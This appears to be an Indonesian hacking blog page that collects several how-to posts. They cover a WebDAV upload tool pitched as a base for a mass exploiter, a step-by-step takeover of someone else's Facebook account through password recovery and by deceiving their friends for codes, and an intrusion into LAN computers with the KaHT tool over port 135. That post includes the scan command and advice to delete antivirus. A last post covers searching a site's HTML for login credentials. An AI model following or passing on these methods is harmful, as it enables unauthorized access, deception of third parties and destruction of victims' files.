Assalamualaikum warrohmatullohi wabarokatu
Halo sobat  , kali ini saya akan berbagi source "Mini Webdav Upload" dengan visual basic 6
dapat source dari codeproject saya ubah2 lagi sedikit hehe :)
ya sesuai banyaknya pesanan source akhirnya saya share source ini juga, lumayan buat pembelajaran
Memang projectnya saya sederhana supaya dapat dikembangkan lagi oleh kalian lagi hehe :D
Penggunaanya gampang tinggal pilih file maka langsung mengupload sendiri filenya
Mau dibikin mass upload atau apapun terserah silahkan kembangkan lagi :D seperti halnya saya mencoba mengembangkannya menjadi mass exploiter webdav hanya saja saya memakai VB.NET tetapi tidak ada bedanya fungsinya masih sama





Langsung saja deh download dan share ke temen2 projectnya supaya bermanfaat :) see you
semoga bermanfaat :


SOURCE MINI WEBDAV--------D O W N L O A D


# sumber loker


Share:

Cara Mudah Hack Facebook Orang Lain dengan Metode Lupa Password

Salah satu cara hack Facebook orang lain yang paling dasar dan bisa dilakukan secara gratis adalah dengan menggunakan metode lupa password. Cara ini sebenarnya disediakan oleh Facebook untuk mengambil alih akun Facebook kamu jika sewaktu-waktu kamu lupa password. Namun, siapa sangka jika ternyata cara ini bisa digunakan untuk membobol password Facebook orang lain?
Cara Mudah hack Facebook_1
Cara Hack Facebook Orang Lain Dengan Metode Lupa Password

Untuk bisa sukses dalam melakukan hack Facebook orang lain menggunakan metode lupa password, ada beberapa hal dasar yang harus kamu ketahui. Yang terpenting adalah email orang tersebut. Terus, cara ini akan sukses jika kamu benar-benar dekat dengan orang yang akan kamu hack Facebooknya. Kenapa harus dekat? Karena Facebook akan melakukan tahap-tahap identifikasi tentang kebenaran pemilik Facebook tersebut.

Jika kamu sudah siap, Jaka akan lanjut ke tahap-tahapnya, yaitu:

    Pertama-tama buka Facebook, lalu pilih Lupa kata sandi Anda. Selanjutnya masukan email tadi. Jika kamu tidak tahu email orang tersebut, kamu bisa lihat dulu ke informasi profilnya jika berteman di Facebook, atau dengan pura-pura menanyakan alamat emailnya untuk keperluan tugas atau apalah alasannya.

Cara Mudah hack Facebook_2

    Jika kamu punya akses ke salah satu dari 3 hal yang ditampilkan oleh Facebook, silakan kamu pilih lanjutkan. Jika tidak, pilih Tidak punya akses kesini lagi?

Cara Mudah hack Facebook_3

    Silakan isi kontak email atau telepon yang bisa dihubungi oleh Facebook. Untuk berjaga-jaga agar tidak curiga, kamu bisa menggunakan email baru yang mirip dengan email sebelumnya. Jadi kamu harus terlebih dahulu menyiapkan email barunya. Sedikit memakan waktu kan? Tapi membuat email itu mudah kok.

Cara Mudah hack Facebook_4

    Tahap selanjutnya, silakan kamu jawab pertanyaan yang ditampilkan. Jika calon korban adalah teman dekat kamu, maka kamu akan dengan mudah menjawab pertanyaannya. Kamu bisa meraba-raba jawaban dari keseharian teman kamu. Jika sukses, kamu bisa langsung mengganti passwordnya. Dan tinggal menunggu 24 jam untuk bisa masuk ke akun Facebook-nya.

Cara Mudah hack Facebook_5

    Jika ternyata pertanyaannya sulit untuk dijawab, kamu bisa pilih Pulihkan dengan bantuan teman. Lagi, Facebook menyediakan bantuan yang justru digunakan sebagai celah untuk membobol keamanan.

Cara Mudah hack Facebook_6

    Dengan memilih tiga orang teman yang ditampilkan, kamu telah mengizinkan Facebook untuk menghubungi mereka guna membantu kamu masuk ke akun Facebook temanmu. Teman yang kamu pilih, mereka akan mendapatkan kode yang nantinya harus kamu masukan di tahap selanjutnya.

Cara Mudah hack Facebook_7

    Di tahap ini, agar bisa meyakinkan teman-teman yang telah mendapatkan kode dari Facebook tadi, kamu bisa membuat akun Facebook baru. Lalu menghubungi dan meyakinkan teman-teman yang tadi kamu pilih untuk minta kodenya. Jika sudah didapatkan, tinggal masukan kodenya pada kolom yang tersedia.

Cara Mudah hack Facebook_8

Terlihat mudah bukan cara hack Facebook orang lain menggunakan metode ini? Meski mudah, kamu harus sabar melakukannya. Namun hasilnya, kamu jadi bisa membobol akun Facebook teman kamu.
Cara Mengamankan Akun Facebook dari Metode Ini

Setelah kamu mengetahui bahwa hacker bisa membobol Facebook kamu dengan metode lupa password, tentu kamu harus berhati-hati. Agar kamu tidak menjadi korban hacker yang menggunakan metode ini, Jaka juga akan berikan kamu cara untuk mengamankan akun Facebook kamu. Selain 8 Hal Yang HARAM Kamu Lakukan di Facebook, ada beberapa hal lain yang harus kamu perhatikan agar Facebook kamu tetap aman, yaitu:

    Gunakan email yang berbeda antara email Facebook dengan email pribadi. Tujuannya agar menghindari teman dekat kamu menggunakan email tersebut untuk percobaan hack.

    Cara untuk mengamankan akun Facebook kamu yang selanjutnya adalah dengan menyembunyikan alamat email di Facebook. Selain menghindari hal yang bersifat phishing dan spam ke email kamu, juga meminimalisir serangan hacker terhadap Facebook kamu.

Cara Mudah hack Facebook_9

    Agar akun Facebook kamu aman, saat memilih pertanyan keamanan pastikan kamu menggunakan jawaban yang sulit sekali. Bukan jawaban yang benar-benar nampak dari keseharian kamu. Orang bisa saja menebak jawabannya dari posting-an kamu di Facebook, atau mungkin kegiatan sehari-hari kamu di kantor. Serta, jangan gunakan hal-hal yang bersifat umum.

    Pelajari lebih jauh tentang metode pemulihan akun Facebook lewat teman. Di sana kamu bisa secara khusus memilih tiga teman yang bisa dihubungi Facebook saat kamu kehilangan akses terhadap Facebook kamu. Pastikan itu adalah teman-teman terdekat yang bisa kamu percaya.

Cara Mudah hack Facebook_10

Nah, itu tadi cara mudah hack Facebook orang lain sekaligus cara untuk mengamankan akun Facebook kamu. Semoga kamu bisa menanggapi artikel ini dengan bijak dan tidak menggunakannya untuk tindakan yang tidak baik. Apa kamu ada cara hack Facebook orang lain dengan cara yang lebih mudah?
Share:

Cara masuk di komputer lain lewat DOS (Windows XP / 2000)

Anda ingin masuk dikomputer teman anda dalam sebuah LAN ? bisa melihat seluruh isi harddisk teman anda, membuat directory, membuat file, mendelete file atau apa saja ? itu mudah, semua caranya ada disini.

Pertama-tama anda harus tahu 2 program penting lalu downloadlah yaitu

internet Maniac (Internet Maniac.exe) … Download Interenet Maniac
Berfungsi untuk mengetahui ip addreas client melalui computer name / hostname

KaHT (KaHt.exe) … Download program hacker KaHT
Berfungsi sebagai program untuk menerobos ke computer server atau client

Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe

Pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara.

Setelah 2 program diatas di download maka ekstractlah dahulu program tersebut, entah pakek WINZIP atau pakek apa.
Kalo udah di extract lalu pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara.

Untuk Windows XP
Cara Pertama Masuk ke Start Lalu Search, lalu pilih computers or people lalu pilih A computer on the Network lalu langsung klik search maka akan segera muncul computer-komputer yang terkoneksi dalam jaringan.

Untuk Windows 95/98/Me/2000 (kalau anda menemukan open port 135 di OS ini) 🙂
Cara Pertama Masuk ke Start Lalu Search Lalu For Files or Folders lalu pada menu Search for other item pilihlah computers, lalu akan muncul Search for computer, maka langsung klik Search Now maka nama-nama computer akan muncul
(Alternatif cara yang cepat dapat mengklik My Network Place / Network Neighboure saja)

Setelah kamu dapetin sasaran computer yang mau di masukin / diremote maka kamu langsung aja kamu jalankan program Internet Maniac
Download IManiac……

Masuklah ke Host Lookup lalu ketikkan nama computer / hostname lalu klik resolve, disini anda akan mendapat alamat ip computer tersebut. Dengan nomor ip ini maka anda sudah mengetahui sasaran computer yang akan di masuki.

Setelah itu selesai maka kita tinggalkan program Internet Maniac, kita akan berlanjut dengan program KaHT, program ini akan didetect sebagai Trojan oleh antivirus, tapi abaikan saja, jangan di hapus / di karantina kalau terdetect, kalau perlu del aja antivirusnya, satu lagi, program KaHT bekerja dalam MS-DOS Mode jadi disini kemampuan anda menggunakan DOS sangat penting, tanpa kemampuan DOS maka anda tidak akan bisa banyak berbuat.

Cara masuk DOS Mode
Untuk Windows XP :
Masuklah ke Start, All programs, Accessories lalu Command Prompt
Untuk Windows 95/98/Me/NT/2000
Masuklah ke Start, Programs, Accessories lalu MS-DOS Prompt

Setelah berhasil masuk DOS maka masuklah di directory program KaHT, masa seh bisa lupa tadi program diextract dimana, hehe, (Misal tadi di extract di C:\KaHT) maka ketikkan “CD\KaHT” dan seterusnya.

Jika sudah, ini saatnya…

Ketikkan “KaHT sebelum_no_ip_komputer_sasaran no_ip_komputer_sasaran.
kalau bingung bisa begini : “KaHT Ip1 ip2”
ip1 : ip awal yang discan
ip2 : ip terahkir yang discan

Misalnya tadi ip-nya 192.168.0.1 setelah di detect pakek Internet Maniac tadi itu lho. Maka ketikkan saja “KaHT 192.168.0.0 192.168.0.1” lalu enter aja Nah disini nanti program akan bekerja otomatis. Setelah selesai menscan jika nanti port 135 ternyata dalam keadaan open maka anda akan otomatis di computer tujuan / sasaran, untuk lebih persisnya anda akan berada di “c:\windows\system” milik komputer tujuan / sasaran setelah pen-scan-an selesai. Anda bisa bebas di computer sasaran, mau edit atau di delete pun bisa, hehe

Nah kalo udah begini kita bisa berkreasi :
Share:

CARA MERETAS SITUS WEB HTML DASAR

 cara mengakses HTML sumber situs web untuk mencoba menemukan informasi login. Meskipun Anda dapat mengakses HTML untuk sebagian besar situs web di sebagian besar browser, hampir tidak ada situs web yang menyimpan kata sandi administrator atau detail masuk lainnya dalam HTML, dan situs web apa pun yang kemungkinan besar masih berada di tahap awal pengembangan.


Tangga
Gambar berjudul Meretas Situs Web dengan Kode HTML Dasar Langkah 1 1

Memahami bahwa metode ini tidak akan berfungsi untuk sebagian besar situs web. Kecuali situs web dibuat menggunakan perlindungan HTML yang sangat sederhana, kata sandi dan informasi masuk akan disimpan dalam format terenkripsi yang tidak dapat diakses dengan melihat HTML situs web.
Gambar berjudul Meretas Situs Web dengan Kode HTML Dasar Langkah 2 2

Buka situs web. Di browser web seperti Chrome, Firefox, atau Safari, buka situs web yang ingin Anda coba retas.
Gambar berjudul Meretas Situs Web dengan Kode HTML Dasar Langkah 3 3

Pergi ke bagian "Login". Jika situs web memiliki bagian login khusus, klik tautan Masuk atau Masuk untuk masuk ke sana.

Jika situs web Anda dimuat ke layar masuk (atau jika bagian info masuk ada di beranda), Anda dapat melewati langkah ini.
Gambar berjudul Meretas Situs Web dengan Kode HTML Dasar Langkah 4 4
Buka kode sumber situs web. Setiap browser memiliki cara berbeda untuk melakukan hal ini dari menu, tetapi cara termudah untuk melihat kode HTML situs web Anda adalah dengan menekan Ctrl + U (Windows) atau ⌘ Command + U (Mac). Ini akan membuka tab baru dengan kode sumber situs web ditampilkan.

Jika Anda menggunakan Microsoft Edge, Anda harus mengklik tab Elemen di menu pop-out yang muncul untuk melihat halaman HTML.
Gambar berjudul Meretas Situs Web dengan Kode HTML Dasar Langkah 5 5

Buka fitur "Cari". Pada tab kode sumber, tekan Ctrl + F (Windows) atau ⌘ Command + F (Mac) untuk meminta bilah pencarian muncul di sudut kanan atas jendela.
Gambar berjudul Meretas Situs Web dengan Kode HTML Dasar Langkah 6 6


Jika Anda mencoba meretas situs web dengan masuk di bawah kredensial administrator situs web, nama pengguna dapat berupa "admin" atau "root".
Gambar berjudul Meretas Situs Web dengan Kode HTML Dasar Langkah 7 7

Coba masukkan kombinasi nama pengguna dan kata sandi yang salah. Jika Anda telah menyisir HTML tanpa hasil pencarian yang memadai, lakukan hal berikut:
Tutup tab sumber.
Ketik huruf acak untuk nama pengguna (atau alamat email) dan kolom kata sandi.
Klik tombol Masuk .
Buka kembali halaman sumber dengan menekan Ctrl + U atau ⌘ Command + U.
Gambar berjudul Meretas Situs Web dengan Koding HTML Dasar Langkah 8 8

Lanjutkan mencari kredensial masuk. Setelah Anda memperbarui kode sumber untuk mencerminkan apa yang ada di halaman upaya masuk gagal, Anda dapat melanjutkan menggunakan bilah pencarian untuk mencari kata kunci yang terkait dengan informasi login.
Gambar berjudul Meretas Situs Web dengan Kode HTML Dasar Langkah 9 9

Masukkan kredensial info masuk apa pun yang ditemukan di situs. Jika Anda dapat mengambil beberapa bentuk nama pengguna dan kata sandi dari HTML situs web, coba gunakan kredensial di bagian login situs web. Jika mereka berfungsi, Anda telah menemukan kredensial yang benar.
Sekali lagi, kemungkinan apa pun yang Anda temukan di HTML berfungsi sebagai proses masuk yang berhasil sangat rendah.
Share:

LINK 4

  • .
  • .
  • .

LINK 3

  • .
  • .
  • .

LINK 2

  • .
  • .
  • .

Postingan Populer

Recent Posts

LINK

  • .
  • .
  • .

PAGES